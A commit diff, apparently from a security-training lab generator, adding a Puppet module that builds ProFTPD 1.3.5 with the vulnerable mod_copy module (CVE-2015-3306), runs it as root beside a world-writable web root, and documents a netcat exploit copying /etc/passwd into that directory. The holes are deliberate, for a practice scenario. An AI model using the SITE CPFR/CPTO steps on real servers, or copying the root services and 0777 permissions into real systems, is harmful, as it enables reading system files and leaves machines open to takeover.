proftpd_1_3_5_mod_copy_remote_command_execution (wip): added secgen_metadata and an example scenario. Removed helpful puppet modules zip file. Next: parameterise me.

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/README.txt

@@ -0,0 +1,43 @@
+Basic Requirements for the vulnerability to work:
+    - MOD_COPY is enabled.
+    - A web server is online and the FTP server user 'nobody' (or a local user specified in the config file but this would complicate things) 
+      has access to the web server directory.
+
+Web Server:
+    - Busybox is used to create a quick website.
+    - The directory for the site is:
+        '/var/www/html/'
+    - Web server is started using the service 'website.service' which runs the script 'WebServer.sh', pretty awful names but it works.
+        
+
+Files:
+    - Proftpd Service File:
+        /etc/systemd/system/proftpd.service
+    
+    - BusyBox Script:
+        /usr/bin/WebServer.sh
+
+    - BusyBox Service File
+        /etc/systemd/system/proftpd.service
+        
+    - Binary File:
+        /opt/proftpd-1.3.5/proftpd
+    
+    - Configuration File (Default config is used):
+        /usr/local/etc/proftpd.conf
+    
+    - Pid File:
+        /usr/local/var/proftpd.pid
+    
+    - Scoreboard File:
+        /usr/local/var/proftpd.scoreboard
+    
+
+Simple Exploitation (Using Netcat):
+You can pretty much copy any file, '/etc/passwd' is used as an example.
+    Commands:
+        - nc <TARGET IP ADDRESS> 21
+        - SITE CPFR /etc/passwd
+        - SITE CPTO /var/www/html/<File Name> (This is the directory of the website)
+
+

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/files/WebServer.sh

@@ -0,0 +1,6 @@
+#!/bin/bash
+while :
+    do
+        sudo busybox httpd -h /var/www/html/
+        sleep 300000;
+done

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/files/index.html

@@ -0,0 +1,9 @@
+<!DOCTYPE html>
+<html>
+    <body>
+        <p>Random Example Website</p>
+        <pre>
+            Website
+        </pre>
+    </body>
+</html>

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/files/proftpd.service

@@ -0,0 +1,14 @@
+[Unit]
+Description=Proftpd 1.3.5 FTP Server
+After=network.target
+StartLimitIntervalSec=0
+
+[Service]
+Type=forking
+User=root
+WorkingDirectory=/opt/proftpd-1.3.5/
+ExecStart=/opt/proftpd-1.3.5/proftpd
+ExecReload=/bin/kill -HUP $MAINPID
+
+[Install]
+WantedBy=multi-user.target

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/files/website.service

@@ -0,0 +1,15 @@
+[Unit]
+Description=BusyBox httpd Server
+After=network.target
+StartLimitIntervalSec=0
+
+[Service]
+Type=simple
+User=root
+Restart=always
+RestartSec=1
+WorkingDirectory=/usr/bin/
+ExecStart=/usr/bin/WebServer.sh
+
+[Install]
+WantedBy=multi-user.target

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/manifests/config.pp

@@ -0,0 +1,31 @@
+#
+class proftpd_1_3_5_mod_copy_remote_command_execution::config {
+  require proftpd_1_3_5_mod_copy_remote_command_execution::install
+  Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] }
+  $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+  $website_dir = '/var/www/html' # If changed, the WebServer.sh script must be changed. 
+
+  # Create /var/www/html/
+  file { $website_dir:
+    ensure  => 'directory',
+    mode    => '0777',
+    require => File['make-install'],
+    notify  => File["${website_dir}/index.html"],
+  }
+
+  # Move index.html dummy website to /var/www/html/
+  file { "${website_dir}/index.html":
+    source  => 'puppet:///modules/proftpd_1_3_5_mod_copy_remote_command_execution/index.html',
+    mode    => '0777',
+    require => File[$website_dir],
+    notify  => Exec['set-perms'],
+  }
+
+  # Set permissions for /var/www/html/
+  exec { 'set-perms':
+    command => "sudo chmod 777 -R ${website_dir}",
+    require => File["${website_dir}/index.html"],
+    notify  => File['/usr/bin/WebServer.sh'],
+  }
+  # Execution is now passed to the service.pp file.
+}

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/manifests/install.pp

@@ -0,0 +1,75 @@
+#
+class proftpd_1_3_5_mod_copy_remote_command_execution::install {
+  Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] }
+  $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+  $user = 'proftpd'
+  $user_home = "/home/${user}"
+  $base_dir = '/opt'
+  $install_dir = "${base_dir}/proftpd-1.3.5"
+  $website_dir = '/var/www/html/'
+
+  # Create user - User creation not really needed for this vulnerability.
+  user { $user:
+    ensure     => present,
+    uid        => '666',
+    gid        => 'root',#
+    home       => "${user_home}/",
+    managehome => true,
+    notify     => Package['build-essential'],
+  }
+
+  # Install dependancies.
+  package { 'build-essential':
+    ensure  => installed,
+    require => User[$user],
+    notify  => Package['gcc-multilib'],
+  }
+  package { 'gcc-multilib':
+    ensure  => installed,
+    require => Package['build-essential'],
+    notify  => File["${base_dir}/proftpd_1_3_5.tar.gz"],
+  }
+
+  # Copy tar ball.
+  file { "${base_dir}/proftpd_1_3_5.tar.gz":
+    source  => 'puppet:///modules/proftpd_1_3_5_mod_copy_remote_command_execution/proftpd_1_3_5.tar.gz',
+    owner   => $user,
+    mode    => '0777',
+    require => Package['gcc-multilib'],
+    notify  => Exec['mellow-file'],
+  }
+
+  # Extract.
+  exec { 'mellow-file':
+    cwd     => $base_dir,
+    command => 'sudo tar -xzvf proftpd_1_3_5.tar.gz',
+    creates => "${base_dir}/proftpd-1.3.5/",
+    require => File["${base_dir}/proftpd_1_3_5.tar.gz"],
+    notify  => Exec['configure'],
+  }
+
+  # Configure.
+  exec { 'configure':
+    cwd     => $install_dir,
+    command => 'sudo ./configure --with-modules=mod_copy',
+    require => Exec['mellow-file'],
+    notify  => Exec['make'],
+  }
+
+  # Compile binaries.
+  exec { 'make':
+    cwd     => $install_dir,
+    command => 'sudo make',
+    require => Exec['configure'],
+    notify  => Exec['make-install'],
+  }
+
+  # Install binaries.
+  exec { 'make-install':
+    cwd     => $install_dir,
+    command => 'sudo make install',
+    require => Exec['make'],
+    notify  => File[$website_dir],
+  }
+  # Execution is now passed to the config.pp file.
+}

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/manifests/service.pp

@@ -0,0 +1,50 @@
+#
+class proftpd_1_3_5_mod_copy_remote_command_execution::service {
+  require proftpd_1_3_5_mod_copy_remote_command_execution::config
+  Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] }
+  $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+  $script_dir = '/usr/bin'
+  $service_dir = '/etc/systemd/system' # If changed, proftpd.service & website.service files must be changed.
+
+  # Copy BusyBox script to /usr/bin/
+  file { "${script_dir}/WebServer.sh":
+    source  => 'puppet:///modules/proftpd_1_3_5_mod_copy_remote_command_execution/WebServer.sh',
+    mode    => '0777',
+    require => Exec['set-perms'],
+    notify  => File["${service_dir}/website.service"],
+  }
+
+  # Copy BusyBox service file to /etc/systemd/system/
+  file { "${service_dir}/website.service":
+    source  => 'puppet:///modules/proftpd_1_3_5_mod_copy_remote_command_execution/website.service',
+    mode    => '0777',
+    require => File["${script_dir}/WebServer.sh"],
+    notify  => File["${service_dir}/proftpd.service"],
+  }
+
+  # Copy proftpd service file
+  file { "${service_dir}/proftpd.service":
+    source  => 'puppet:///modules/proftpd_1_3_5_mod_copy_remote_command_execution/proftpd.service',
+    mode    => '0777',
+    require => File["${service_dir}/website.service"],
+    notify  => Service['website'],
+  }
+
+  # Start services
+
+  # Web Server
+  service { 'website':
+    ensure  => running,
+    enable  => true,
+    require => File["${service_dir}/proftpd.service"],
+    notify  => Service['proftpd'],
+  }
+
+  # Proftpd
+  service { 'proftpd':
+    ensure  => running,
+    enable  => true,
+    require => Service['website'],
+  }
+  # End of Module.
+}

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/proftpd_1_3_5_mod_copy_remote_command_execution.pp

@@ -0,0 +1,3 @@
+include proftpd_1_3_5_mod_copy_remote_command_execution::install
+include proftpd_1_3_5_mod_copy_remote_command_execution::config
+include proftpd_1_3_5_mod_copy_remote_command_execution::service

modules/vulnerabilities/unix/ftp/proftpd_1_3_5_mod_copy_remote_command_execution/secgen_metadata.xml

@@ -0,0 +1,94 @@
+<?xml version="1.0"?>
+
+<vulnerability xmlns="http://www.github/cliffe/SecGen/vulnerability"
+               xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+               xsi:schemaLocation="http://www.github/cliffe/SecGen/vulnerability">
+  <name>ProFTPD v1.3.5 Mod Copy Remote Command Execution</name>
+  <author>Anass Naveed</author>
+  <module_license>MIT</module_license>
+  <description>The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.</description>
+
+  <type>ftp</type>
+  <privilege>root_rwx</privilege>
+  <access>remote</access>
+  <platform>linux</platform>
+  <difficulty>low</difficulty>
+
+  <read_fact>server_name</read_fact>
+  <read_fact>strings_to_leak</read_fact>
+  <read_fact>leaked_filenames</read_fact>
+  <read_fact>welcome_msg</read_fact>
+  <read_fact>port</read_fact>
+  <read_fact>strings_to_pre_leak</read_fact>
+  <read_fact>pre_leaked_filenames</read_fact>
+
+  <!-- No organisation by default, overrides other values if provided through scenario. -->
+  <read_fact>organisation</read_fact>
+
+  <default_input into="port">
+    <value>21</value>
+  </default_input>
+
+  <default_input into="server_name">
+    <generator type="username_generator"/>
+  </default_input>
+
+  <default_input into="strings_to_leak">
+    <generator type="message_generator"/>
+  </default_input>
+  <default_input into="leaked_filenames">
+    <generator type="filename_generator"/>
+  </default_input>
+
+  <default_input into="welcome_msg">
+    <generator type="message_generator"/>
+  </default_input>
+
+  <!-- pre-leaked, these details are leaked before the main vuln is exploited, for example hidden content or hosted files -->
+  <default_input into="strings_to_pre_leak">
+    <generator type="message_generator"/>
+  </default_input>
+
+  <default_input into="pre_leaked_filenames">
+    <value>note</value>
+  </default_input>
+
+
+  <!--optional vulnerability details-->
+  <cve>CVE-2015-3306</cve>
+  <cvss_base_score>10</cvss_base_score>
+  <cvss_vector>AV:N/AC:L/Au:N/C:C/I:C/A:C</cvss_vector>
+  <reference>https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_modcopy_exec/</reference>
+  <software_name>proftpd</software_name>
+  <software_license>GPL</software_license>
+
+  <!--optional hints-->
+  <msf_module>exploit/unix/ftp/proftpd_modcopy_exec</msf_module>
+
+  <!--Cannot co-exist with other installations-->
+  <conflict>
+    <software_name>proftpd</software_name>
+  </conflict>
+  <!--Cannot co-exist with other ftp servers (default to same ports)-->
+  <conflict>
+    <type>^ftp$</type>
+  </conflict>
+
+  <requires>
+    <type>update</type>
+  </requires>
+
+  <CyBOK KA="MAT" topic="Attacks and exploitation">
+    <keyword>EXPLOITATION</keyword>
+    <keyword>EXPLOITATION FRAMEWORKS</keyword>
+    <!-- TODO: Add - web shell; remote command exec; -->
+  </CyBOK>
+  <CyBOK KA="SOIM" topic="PENETRATION TESTING">
+    <keyword>PENETRATION TESTING - SOFTWARE TOOLS</keyword>
+    <keyword>PENETRATION TESTING - ACTIVE PENETRATION</keyword>
+  </CyBOK>
+  <CyBOK KA="NS" topic="PENETRATION TESTING">
+    <keyword>FILE - TRANSFER PROTOCOL (FTP)</keyword>
+  </CyBOK>
+
+</vulnerability>

scenarios/examples/vulnerability_examples/proftpd_1_3_5_mod_copy_remote_command_execution.xml

@@ -0,0 +1,16 @@
+<?xml version="1.0"?>
+
+<scenario xmlns="http://www.github/cliffe/SecGen/scenario"
+          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+          xsi:schemaLocation="http://www.github/cliffe/SecGen/scenario">
+
+  <system>
+    <system_name>web_server</system_name>
+    <base distro="Debian 10" type="desktop" name="KDE"/>
+
+    <vulnerability module_path=".*/proftpd_1_3_5_mod_copy_remote_command_execution"/>
+
+    <network type="private_network" range="dhcp"/>
+  </system>
+
+</scenario>